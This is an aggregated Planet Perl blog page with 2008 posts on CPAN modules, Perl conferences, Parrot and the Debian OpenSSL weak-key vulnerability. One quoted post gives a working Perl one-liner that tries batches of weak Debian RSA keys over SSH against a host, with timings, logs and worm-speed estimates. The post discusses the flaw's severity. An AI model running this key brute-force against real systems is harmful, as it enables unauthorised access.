|
このページは大阪弁化フィルタによって翻訳生成されたんですわ。 |
Planet Perl is an aggregation of Perl blogs from around the world. Its an often interesting, occasionally amusing and usually Perl related view of a small part of the Perl community. Posts are filtered on perl related keywords. The list of contributors changes periodically. You may also enjoy Planet Parrot or Planet Perl Six for more focus on their respective topics.
Planet Perl provides its aggregated feeds in Atom, RSS 2.0, and RSS 1.0, and its blogroll in FOAF and OPML
There is life on other planets. A heck of a lot, considering the community of Planet sites forming. It's the Big Bang all over again!
This site is powered by Python (via planetplanet) and maintained by Robert and Ask.
Rate a CPAN module today!
One of the tough challenges facing someone new to Perl, or even someone who has been using it for years, is navigating the huge number of modules available via the Comprehensive Perl Archive Network (CPAN). CPAN is very comprehensive, with the little stats in the corner listing 6,500+ authors, 15,000+ distributions, and 55,000+ modules. That's a lot of code.
Unfortunately, being faced with so many options can be daunting. The search.cpan.org interface tries to show the most relevant results first, and seems to pay a good amount of attention to CPAN Ratings, and rightly so. In order for a module to be rated, someone has to get themselves a bitcard account (usually meaning they're a CPAN author themselves), use the module, and have the time and passion to write a review. This means that when such reviews do come in, they're highly relevant.
Unfortunately, not very many modules have been given reviews, and often those reviews are given to modules that already have a substantial number already, like DBI. Yet it's the modules that don't occur commonly in literature that need the reviews the most.
So, dear reader, today I wish to give you a quest. Go to CPAN Ratings, search for a module you use, and if it doesn't have a review, write one. That's it, just a single review. I don't care if you love the module or hate it, just let the world know how you feel. It can be a single sentence if you like. Heck, you can even critique one of my modules if you want. Just write a review.
If you don't know where to start, go to a piece of code you've worked on, or the tests for that code, and just look at the use lines. Trust me, you'll find something you care about. It may even be something that was so simple and easy to use that you had forgotten all about it.
Finally, if you're itching to start a new project, and need an idea, turn CPAN Ratings into a game, the same way it was done with the CPAN Testing Service and Kwalitee, or PerlMonks and their XP system. New reviews on a module give you +2 points, reviews on a module that already has reviews give you +1 point, each person who found your review useful gives you +1 point, and each person who didn't find your review useful gives you -1 point.
Posted: 15th May 2008.
Tags: cpan cpants gaming kwalitee perl programming
Bookmark:
IPC::System::Simple released - Cross-platform, multi-arg backticks
One of my greatest itches with Perl is the difficultly in doing things correctly with the system() command, which allows one to run a process and wait for it to finish, and backticks (aka qx()), which allows one to run a process and capture its output.
It's not that these commands are hard to use. system("mount /dev/backup") and I've got my backup media mounted. my $config = qx(ipconfig) and I've got my Windows IP configuration. They're dead easy to use, they're just a pain to tell if they worked.
After running, these commands set a special variable named $?, or $CHILD_ERROR if you've told perl to use English. This variable is designed to be "friendly" to "C programmers", who are familiar with the return value of the wait() system call. But who on earth wants to be familiar with the return value of wait()? After teaching thousands of people Perl over the last seven years, I've only had two people admit to know what the wait() return value looks like, and both of them needed therapy afterwards. It's a packed bit-string, and is grossly unfriendly for anyone to use in any language.
So, the usual state of affairs for many developers is they go through their day using system() and backticks and completely ignoring $?, because it's too hard. Then one day a disaster happens where they discover that all their backups are empty, or all their files are corrupted, or all their furniture has been repossessed, because their calls to system() have been failing for years, but nobody noticed because $? was too ugly to contemplate.
Those developers who have been through this process, or seen other people's lives ruined usually try to take a little more care. They recall that $? will be exactly zero if the process ran to completion and returned a zero exit status, which usually indicates success. Their code becomes littered with statements like $? and die $? or system(...) and die $?. That makes them feel warm and fuzzy until they discover it doesn't work. Their command may legitimately return a range of statuses to indicate success, and a whole bunch of things to indicate failure. Worse still, printing the contents of $? as an error message is worse than useless. Nobody understands what the hell it means; if you did, you wouldn't be printing it.
The end result of all this is that Perl sucks at something it's supposed to be good at; namely firing off system commands and being awesome for system administrators. It is this problem that IPC::System::Simple solves.
Put simply, if you're using IPC::System::Simple, you can replace all your calls to system() with run(), and all your calls to backticks with capture(), and it will all work the same way, except that you'll get incredibly useful messages on error. Got a funny exit status? It'll tell you what it is, and the command that caused it. Killed by a signal? You'll get not just the number, but its name, as well a whether it dumped core. Passed in tainted data? You'll get told what was tainted. And it gets better.
Let's say that you're using rsync to backup your files from an active filesystem. It exits with 0 for good, and 24 for "files went missing". On an active filesystem, files disappearing can be considered normal, so we'd like both of these to be considered 'fine'. Anything else, we'd like to get told. Can we do this with IPC::System::Simple? We sure can! Just provide the list of acceptable exit statuses as the first argument:
run( [0,24], "rsync ....")
IPC::System::Simple's run command also works the way that the Perl security pages say that system() should run. That is, when called with multiple arguments, it bypasses the shell. Perl's regular system() when called with multiple arguments will go and use the shell anyway when on a Windows system, which is bad if you were trying to avoid shell meta-characters.
You can get the same shell-bypassing behaviour with capture(); just pass it in multiple arguments and you're done. This even works under Windows, which normally doesn't even support shell-bypassing pipes, let alone checking your command's return values and formatting your errors afterwards. You even get the full 16-bit Windows exit value made available to you, which is something $? and its dark terrors will never give you.
Best of all, installing IPC::System::Simple is a breeze. It's pure perl, with no dependencies on non-core modules. Even if you have no other way of installing modules, you can just copy the .pm file into an appropriate directory and you're done.
Don't put up with the tragedies and uncertain futures that system() and backticks can bring. Use IPC::System::Simple and make handling your system interactions correctly a painless experience.
Posted: 13th May 2008.
Tags: ipc-system-simple perl programming sysadmin
Bookmark:
IPC::System::Simple 0.08 released
Hot on the heels of v0.07, I've released IPC::System::Simple v0.08. The most important changes are documentation fixes thanks to Matt Kraai, a mistake fixed in one of my tests, and better support for taint under Perl 5.6.x.
You can grab the new release from a CPAN mirror near you once it finishes indexing.
Posted: 13th April 2008.
Tags: ipc-system-simple perl
Bookmark:
IPC::System::Simple 0.07 released
The new version provides better diagnostics when used with tainted data, better testing under some more exotic systems, and a few documentation tweaks. You can grab the new version from a CPAN mirror near you (once it finishes indexing), and if you like the module, you can even vote for it using CPAN ratings.
Posted: 12th April 2008.
Tags: ipc-system-simple perl
Bookmark:
RFC: lethal - lexical exceptions for Perl
I've been scratching a long-time itch of mine, which is that while Perl allows me to use Fatal to get subroutines and built-ins to throw exceptions on failure, such a change was always done on a package-wide, rather than lexical (block) basis.
However with Perl 5.10 we have the ability to fix that, and I've put together a proof-of-concept module that enables exception-throwing subroutines on a lexical basis.
I'm looking for input into its naming, interface, and concept in general. Rather than filling up a blog post with it, you can read the node on PerlMonks.
Posted: 10th March 2008.
Tags: exceptions lethal perl perl510
Bookmark:
Intruder Alert - Tracking down a rogue connection
The hosts I administer look through their logfiles each hour, looking for things that are out of the ordinary, and mailing them to me. This is where my uncanny ability to remember leap-seconds comes from; it's not because I actually care about things, but because I'll get an e-mail saying that a host suddenly found itself a whole second out of sync with some incredibly accurate clock somewhere. Lucky me.
Most things don't end up in my log digests, because most things are boring. The things I do see are things that I either care about, or have never seen before.
A few days ago I got an e-mail that one machine was trying to contact a particular address, 172.16.45.35. What made this noteworthy is that address is unroutable. It's a reserved, private address space. It doesn't go anywhere on the Internet, and it's not used by us internally, so there should be no reason to try and contact it. The connection indicated it would have been an outgoing web request, and since I was busy working on other things, I assumed that some other fool had set up their system incorrectly, and thought nothing of it. People leave references to their own internal sites in documents all the time.
A few days later I got another e-mail, same result. And then another, the next day, and another. Each time I looked a little closer. About the same time each day, a few attempts to contact this address, and then nothing.
Today, this bothered me. What if we're seeing these packets because there's something running on this machine that shouldn't be? So I go to my proxy logs, and do a search for the address. Nothing matches.
Hmm, that's odd. Let's see what's in our name-server cache, since the address is probably the result of a name lookup. kill -INT on your named will let you see its memory cache, a great trick to remember. Nothing in here, either, but it's now been hours since I got the mail, so the record may well have expired.
What's odd about this connection is that it seems to happen around lunchtime, but not every day, and not always exactly the same time, and sometimes it misses days, so I don't really know if or when I'll ever see it again. Rather than trying to futilely trying to find it minutes after it occurs, I figure that I'll set something running to catch it in the act:
lsof -r1 +c0 -ni@172.16.45.35 | grep --line-buffered -v ======= | tee 172.16.45.35-watch
Every second I'll look for anything involving that address using lsof, remove the boring separators, and chuck it into a file and STDOUT. The --line-buffered option is important so that grep doesn't delay the flow of data.
While I've got that running, I whip up a bit of perl to watch the output, and grab fingerprints of the process when we spot it; most of the contents of the relevant entry in /proc will do nicely.
I leave my tools to run in a screen session (which will preserve them even if my terminal goes away), make dinner, have an extremely nice home-brew beer, and watch some TV. In this case, House MD.
As is common in many episodes of House, the patient is sick with a disease that should have been obvious, since they test for that particular disease in every single episode (expect this one). Not long afterwards, it dawns upon me what my problem may be.
I go to the proxy logs, and I look up all the addresses of all the sites accessed today:
perl -pe'my @f = split(/\s+/,$_); $_ = $f[6]; s{^http://}{}; s{[:/].*}{}; $_ .= "\n"' access.log | sort | uniq | perl -MIO::Handle -MNet::DNS -e'my $dns = Net::DNS::Resolver->new; STDOUT->autoflush(1); while (<>) { chomp; print "== $_ ==\n"; my $q = $dns->search($_); if ($q) { foreach my $rr ($q->answer) { print $rr->address,"\n" if $rr->type eq "A" } } else { warn $dns->errorstring; } }' | tee /tmp/squid-dns
Sure enough, after a few moments my answer pops out! The address proof.smh.com.au resolves to 172.16.45.35. SMH is the Sydney Morning Herald, and it looks like some of their pages refer to an internal machine, which my reporting system is dutifully reporting as odd. Sure enough, all the dates and times in the squid logfiles match up nicely with the packet intercept reports I was sent.
The reason it wasn't showing up when I first searched is that squid only records IP addresses when it needs to make a direct connection. In this case, it tried to make the connection and failed, but rather than giving up it then proceeds to try and hand the problem off to an upstream cache, and that's what gets reporting in the logfile.
This is good for me, since it means that the odd connections really are what I thought they would be, and not a sign of unwanted activity on one of my machines. I'm doubly glad because it would be especially embarrassing to find a rootkit that's so badly written that it tries connecting to a completely unroutable address.
Posted: 21st November 2007.
Bookmark:
Melbourne Perl Mongers
Melbourne Perl Mongers is meeting tomorrow (Wednesday) night, and both Rick Measham and myself will be presenting.
6:30pm Wednesday 8th August
Editure
Level 8
14 Blackwood St
North Melbourne
Effective Procrastination with HiveMinder
If you're like most people, you've got dozens of things that need doing.
Work, shopping, chores, programming, hobbies, tax, holidays, bills, and so
on. You may have tried to keep a to-do list, but found it rapidly grew to
the point of being unmanageable.
Paul Fenwick will demonstrate the use of the free HiveMinder.com to-do service to both manage tasks and to procrastinate effectively, allowing you to focus only on the tasks that really need to be done. We'll see how to manage tasks via the web, via-email, and how to be really efficient via instant messenger.
To conclude, we'll see how it's possible to add new features to HiveMinder and some tricks and tips for doing so.
Microblogging with Jaiku and Net::Jaiku (Rick Measham)
Net::Jaiku - an introduction to microblogging and lifestreaming, plus a
bonus: Using microblogging as a development tool.
Posted: 9th October 2007.
Tags: hiveminder jaiku melb.pm melbourne perl presentations procrastination talks todo
Bookmark:
Perl tips via Atom
For all those people who'd prefer yet-another-feed over yet-another-mailing-list, Perl Training Australia's Perl tips are now available via Atom and FeedBurner as well as via e-mail. RSS will follow if anyone asks nicely.
Posted: 16th September 2007.
Tags: atom perl syndication tips
Bookmark:
SweeperBot - Play MineSweeper Automatically!
My latest project has finally been launched. See SweeperBot.org for the latest in Windows productivity software. Even if you don't use Windows, do watch the 50 second video on the site; it represents a whole day of my life spent poorly, and I think it's hilarious. ;)
For anyone wondering, yes, it's written in Perl. It uses PAR/PP to package the whole thing up into a single Windows executable. Yes, it plays MineSweeper acceptably well, thanks to Audrey Tang showing me the cheat codes at OSDC a few years back. ;)
Posted: 19th May 2008.
Tags: games minesweeper perl sweeperbot windows
Bookmark:
IPC::System::Simple v0.06
IPC::System::Simple v0.06 has been released, and should be hitting a CPAN mirror new you shortly. The new release includes:
Posted: 6th September 2007.
Tags: ipc-system-simple perl win32
Bookmark:
They were walking to the Hemlock, the Rooster and the Mice, and the Mice kept looking at one another, questioning.
"We don't know what the future holds, do we?" said Chauntecleer. The Mice all shook their heads. They knew very little of anything. "If," said Chauntecleer, "I say, if I don't come back again, then you must make this food to last a long, long time. I trust your prudence, don't I?" he asked, and they nodded automatically, but their eyes were very big. "And I trust your integrity, right?" They nodded. "And you are mature, now, and I respect your maturity, isn't that so?" Poor Mice, they nodded and nodded, and they blinked, and they nodded. They looked afraid. "Good," said Chauntecleer. "I know I won't be disappointed.
In this way he gave each Mouse a manhood. They couldn't talk to him just now, having so much to turn over in their minds. But neither did they cry.
— The Book of Sorrows, by Walter Wangerin Jr.
On behalf of the Parrot team, I'm proud to announce Parrot 0.6.2 "Reverse Sublimation." Parrot is a virtual machine aimed at running all dynamic languages.
Parrot 0.6.2 is available via CPAN (soon), or follow the download instructions. For those who would like to develop on Parrot, or help develop Parrot itself, we recommend using Subversion or SVK on our source code repository to get the latest and best Parrot code.
Parrot 0.6.2 News:
Gracias to all our contributors for making this possible, and our sponsors for supporting this project. The next scheduled release will occur on 17 June 2008.
Enjoy!
Read more of this story at use Perl.
I’m on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies “the easy stuff” — greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. — in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend — and, key point, off your SpamAssassin setup. ;)
Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they’re making it available as a download at http://mailchannels.com/download/. Apparently: “it’s free for low-volume use, but high volume users will need a license key.”
Anyway, take a look, if you’re interested. I think it’s pretty cool. (And I’m not just saying that because I’m on their tech advisory board. ;)
Great article from LWN.net regarding the Debian OpenSSL vulnerability:
It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities — typically distributions, but sometimes users — to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.
Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution’s package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.
+1.
Every year, at OSCON, the White Camels are presented.
If you look at the previous winners, you'll notice that these are mostly unsung heroes, like previous awardee Eric Cholet, the human moderator of so many Perl mailing lists, or Jay Hannah, one of the people running pm.org (if you ever created/maintained a pm group, chances are that Jay walked you through the process).
Some of these people may be well known, like Allison Randal or Randal Schwartz, while others may be complete strangers to at least part of the globe, like Josh McAdams or Jay. Some of them may be extreme Perl hackers who created the original JAPH, but they actually received this award as a recognition for their community contributions to Perl.
That's not to say a great hacker can't receive the award, but you don't have to be one in order to be eligible.
That being said, the nomination process for the 2008 White Camels is now open.
If you think there's someone who deserves a White Camel, this is the time for you to send in your nominations. Send them to jose@pm.org, if possible with a subject along the lines of "White Camel Nomination :: $name". Make sure you properly identify the nominee and tell us why you think that's a worthy nomination.
Don't go thinking "nah, somebody else will do it" because: a) everybody else may be thinking the same, and b) you may state your case differently than the next person.
We'll be receiving nominations until June 11, 2008, by midnight, but don't wait up or you'll forget. Do it now!
Just a gentle reminder to folks: you can email me about my CPAN modules as much as you want. I don't mind. There is, however, an excellent chance that you'll never get a reply. I mean to reply, but I forget, get distracted, whatever. If it's a question about a module or general discussion, that's OK. I might remember to answer. I might not. However, if it's a bug or feature request, please put those things in the RT queue for the CPAN module and even though there's just as great a chance that I'll forget, at least RT won't forget and I'll have a better chance of seeing it later. More importantly, someone else has a better chance of seeing it later.
I have several bugs that I've cleaned up on RT because I was going through and paying attention to them. That doesn't happen with email.
PS: And please don't tell me to organize my email better. I already have tons of organization in my email, but most of us already know the old saw about too many levels of abstraction. Same thing. I'm just not an email guy.
Aaron Trevena wants to get the Perl 5 wiki up to 1,000 pages, and it's almost at 900.
The Most Wanted Pages is a great place to start. Pick a page that some other page has linked to, and create it. It's that simple.
Read more of this story at use Perl.
Read more of this story at use Perl.
I decided to work on my logic programming module again today. I've eradicated lots of bugs (and probably found lots more). Here's a basic demo:
use AI::Perlog ':all';
my $data = AI::Perlog->new( { predicates => [qw/beautiful likes shiny/] } );
$data->add_facts(
[qw/ beautiful people /],
[qw/ shiny Firefly /],
[qw/ shiny Kaylee /],
[qw/ likes ovid whiskey /],
[qw/ likes andy whiskey /],
);
# declare a logic variable
var my $stuff;
$data->add_rules(
rule( 'likes', 'ovid', $stuff )
->if( [ 'shiny', $stuff ] ),
);
var my $what;
my $results = $data->query( 'likes', 'ovid', $what );
while ($results->next) {
print 'Ovid likes ', $what->value, "\n";
}
__END__
Ovid likes whiskey
Ovid likes Firefly
Ovid likes Kaylee
Note how we're pulling data not just from the fact that 'ovid likes whiskey', but also from the rule 'ovid likes shiny stuff' and both 'Firefly' and 'Kaylee' are shiny stuff. Making logical inferences like this is what logic programming is all about!
It's not even close to being releasable due to lots of bugs and no documentation, though. For example, the append/3 predicate is horribly broken and there are lots of problems with undefined variables. There also appear to be problems in the backtracking engine.
Read more of this story at use Perl.
Read more of this story at use Perl.
I thought I was over my jetlag, but instead I woke up at 4am this morning. This was a perfect excuse to head over to Tsukiji for sushi for breakfast. So good!
First talk this morning Kang-min Liu "JavaScript::Writer fun". "my new toy". "You write Perl, Perl writes JavaScript". AUTOLOAD magic. "The stock price on Prototype.js is going down"
Daisuke Murase (typester) - "FormValidator::Assets", which looked interesting.
Hiroshi Sakai (ziguzagu) - "OpenSource TypePad Mobile" was all about hacking Atom and Movable Type open source including HTML::Split, teasing about HTML::MobileFilter, open emoticons,
Masahiro Nagano (kazeburo) - "memcached in mixi" gave general details about memcached use and then went into details at mixi: 94% cache hit rate, 223 GB cache in total, maxing out at 15,000 requests per second at 400Mbps. Interesting they up the number of buckets in memcached's internal hash table from 16 to 25 as they have large objects.
Chia-liang Kao - "Branch Managment with SVK 2.2". Workflow for feature-based development - features or bugfixes handled in branches, then merged to RC (QA, testing) and then merged to trunk and live. There is a new svk branch command.
Tatsuhiko Miyagawa - 20 modules I haven't yet talked about". Renamed to 10 modules: HTTP::ProxyPAC (Spidermonkey, argh), pQuery ('no capitalization 'pQuery::DOM'), PHP::Session "I've actually never used it", autobox::DateTime::Duration, Time::Duration::Parse, Encode::DoubleEncodedUTF8 "useful and evil", URI::Find::UTF8, Lingua::JA::Hepburn::Passport, LWP::UserAgent::Keychain, XML::Liberal "People are stupid. Cloud is full of crap. Software can fix it". "I want to hear your version of this talk if you have >10 modules on CPAN".
We had a quick lunch - curry-don, mmm.
Jesse Vincent - Everything but the secret sauce Find bugs faster: TAP::Harness::Parallel, TAP::Harness::Remote, TAP::Harness::Remote::EC2, Carp::REPL. Build web apps: Template::Declare (soon: compile to JavaScript), CSS::Squish. Ship software: App::ChangeLogger, Shipwright (build all dependencies, everything above libc - platform neutral source distribution or platform specific binary distribution). Get input from users: Date::Extract, the feedback box. Own the Inbox: Net::IMAP::Server, with.hm.
Then we ate Yahoo! Japan snacks. Really.
Casey West - "Build Domain Specific Languages with Perl" testing DSL along the lines of "Title should be {'Twitter'}".
Jeff Kim - "Gungo and cloud computing, a scalable crawling and processing framework" deployed on EC2 and S3 and a happy user.
Then the wrapup started - Jose Castro told us what he had learned in Tokyo (he can stop Japanese babies crying), Schwern told us that Perl is a zombie (oh no wait, it was really about decentralising and caring about people who aren't other programmers) and then it was over. Many thanks for an excellent conference!
Today's Parrot speedups add up to almost 50%. That's right -- a little rethinking nearly doubled the benchmark speed.
Patrick said he'd work on this a little bit, but I ran a couple of quick tests. The NQP grammar included with Parrot 0.5.2 builds in 5.575 wallclock seconds with today's new Parrot. It built in 12.956 seconds with Parrot 0.5.2. Today's version of the grammar failed to build with Parrot 0.5.2 after 20.636 seconds. It builds with today's Parrot in 16.322 seconds.
Those numbers aren't scientific (despite all those decimal points of precision), but they're roughly correct. I trust Callgrind's accuracy more for comparison. Parrot 0.5.2 spent 21,285,518,488 cycles building its grammar. New Parrot spent 9,189,968,377 cycles building the grammar for 0.5.2.
The grammar as of r27568 is 2332 lines long; it was 806 lines long in Parrot 0.5.2. It costs 24,377,028,231 cycles to build in today's Parrot. Doubling the speed in six months is good. Doubling the speed while adding so many new features is even better. Also keep in mind that most of the optimizations were in the core of Parrot, not in NQP or PIR. We don't yet have a good way to profile PIR, so we've performed very few optimizations at that level. There are likely several decent improvements lying in wait.
If there's sufficient interest, I'll explain today's two optimizations in a future post.
As Eric quoted me in the Revision Control for all of CPAN proposal, "I'm looking forward to it."
Having the history of a distribution available publicly in a format which allows (or encourages) a history-like view is a great thing. That said, it's not an easy or simple problem to solve, but in my mind the benefits are not primarily offering public revision control to authors. (I can imagine offering read-only access.) The primary benefit is offering Backpan in a form much easier to use than juggling tarballs.
That wouldn't be as useful if all authors made their complete version control histories public, but first things first.
Douglas Crockford of JSON fame has written a beautiful book about JavaScript.
First of all - at only 170 pages it is short. Even though some of the key points are repeated through the book it's dense with information. You don't need any JavaScript experience, but it's not a "beginning programming" book so if you haven't been programming before this is not the right book for you.
Reading this book a couple of times will give you an appreciation for the JavaScript language that you almost certainly didn't have before. It'll give you tools to write better programs that you and others will actually be able to maintain over time.
I've learned lots of little things that I maybe knew from experience, but now I know and I know why.
This book will help you battle with JavaScript rather than against it.
(this review was also posted on amazon.com)
After reading half the book I went and bought a bunch of extra copies and had them sent to people I work with who are working with JavaScript.
Just announced on the TPF news site, a huge donation to TPF to fund Perl 6 development:
On May 14, 2008, The Perl Foundation received a philanthropic donation of US$200,000 from Ian Hague. Mr. Hague is a co-founder of Firebird Management LLC, a financial fund management company based in New York City. This donation was the result of extensive discussions between Mr. Hague, The Perl Foundation and a Perl community member who wishes to remain anonymous.
The purpose of the donation is to support the development of Perl 6, the next generation of the Perl programming language. Roughly half of the funds will be used to support Perl 6 developers through grants and other means. The balance of the funds will be used by The Perl Foundation to develop its own organizational capabilities. This will allow The Perl Foundation to pursue additional funding opportunities to support Perl 6 development. Mr. Hague wants his contribution to be seed funding in that effort.
The Perl Foundation thanks Mr. Hague in the deepest possible terms. This donation is unprecedented in its generosity, scope and vision, and it is precisely what was needed at this junction in the development of Perl 6. We look forward to the greatest of successes with Perl 6, and this contribution is a key part of making that happen. The Perl Foundation will communicate further developments with the Perl community and Mr. Hague as the pieces of this plan are executed.
Thank you to Mr. Hague for supporting Perl 6's continued development.
Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:
when doing this, connecting to localhost:
find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'4.63user 3.06system 0:19.54elapsed
ie about 50 per second
when connecting remotely over the internet (ping RTT is ~60ms):
find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'1.10user 0.60system 0:35.15elapsed
ie about 6 per second over the internet.
Logging of the failures on the server side looks like this:
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1 May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote: 74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.
So given that:
- RSA is the default if you don’t specify for ssh-keygen
- 99.99% of people use x86
- PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild
then:
Probably there’s about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine — you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.
Read more of this story at use Perl.
If you’ve been following the Debian OpenSSL pRNG security debacle, you may have noticed that there’s a painful problem for people who’ve used a Debian or Ubuntu system in the process of buying a commercial SSL key — they are in a situation where those commercially-purchased keys need to be regenerated.
(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)
Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:
SSL Certificate Reissuance
If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key’s CSR, and submit it to your CA according to their reissuance policy:
- GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
- Thawte: Here (Available throughout the lifetime of the certificate.)
- VeriSign: Unknown
- GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process “re-keying”, while they call the act of sending you the same signed certificate as your original order a “reissuance”.)
- ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
- CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time as it seems that many users are re issue there certificate.
- Digicert: Login to Your account to re-issue (free).
This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.
Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the “buy” link for reissuance insurance — the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)
Read more of this story at use Perl.
Read more of this story at use Perl.
Read more of this story at use Perl.
Here follows quick writeups of the talks I attended.
Jose Castro gave a "less than 10 minutes" Perl Foundation talk.
Larry Wall "Standards are meant to be broken" - A typical Larry talk, this covered many things including names, names dispatch at compile time, short names and long names. Not about the language, but more about the parser. Perl6 grammar is flexible and Perl has no core, no operators, no language, "I've been working on a "longest token matcher" for the last year", JIT lexer per language. "Perl 6 is designed to extensible, so please embrace it and extend it".
Kang-min Liu "Continuous testing". Eclipse plugin for java that runs JUnit led Test::Continuous, which checks the files you have modified and runs the appropriate tests. CPANFTW: File::Modified, Module::ExtractUse, App::Prove, Log::Dispatch.
Jose Castro "Perl Black Magic - Obfuscation, Golfing and Secret Operators in Perl" is still a very amusing talk on how to scare people.
Lunch! Sandwiches were provided, but I escaped for katsu-don nearby. Tasty!
Ingy dot Net "JavaScript Love for Perl Hackers" covered many topics: vroom - vim love for perl hackers. pQuery - jQuery in Perl (has one thing that jQuery will never have - Perl!). something to learn Taiwanese. JS.pm - storing JavaScript in CPAN.
Leon Brocard "Working in the cloud". Hey, that's my talk, and I managed to pull it off with only one line of Perl code in the whole slide deck. See the slides.
Jesse Vincent "Step 3: Prophet - A peer to peer replicated property database" was a very interesting talk and a little bit of a reply to mine. Prophet is the cool part, and as an example application there is a p2p bug tracker called sd. The hard part is self-healing conflict resolution. "svk for bigtracking". "private social networking". "Jifty, Catalyst, Rails models in future".
Chia-liang Kao "Running Perlish Small Business with Perl" was great. He made individualised buttons for OSDC.tw in Cairo. "Mass customisation". Perl hacking to make businesses run.
Makoto Kuwata "The Fastest Template Engine in the Perl World". Tenjin. Compiles to Perl templates because the templates are Perl.
Lightning talks were very amusing (and harder to write up).
Jonathan Rockway "String::TT". String overloading. Excellent.
"i love money!" yapc asia finances finances over time, -2 million yen before yapc::asia last year. 2008: positive all the time, up to 2 million yen before conference
Daisuke Murase "Open Fastladder with Plagger" - popular web-based rss reader on your computer
"How many cpan authors are there now?". Annual nipotan contest. Best kwalitee Japanese CPAN author. Acme::CPANAuthors
Takeu Inoue "Developing Amazon's dynamo in POE and Erlang" kai - yet aother amazon's dynamo obra: "Actually, writing a new database is totally the new writing a new VCS"
Perlmachine: Perl OS, including Perl floppy driver. He will write multitask version.
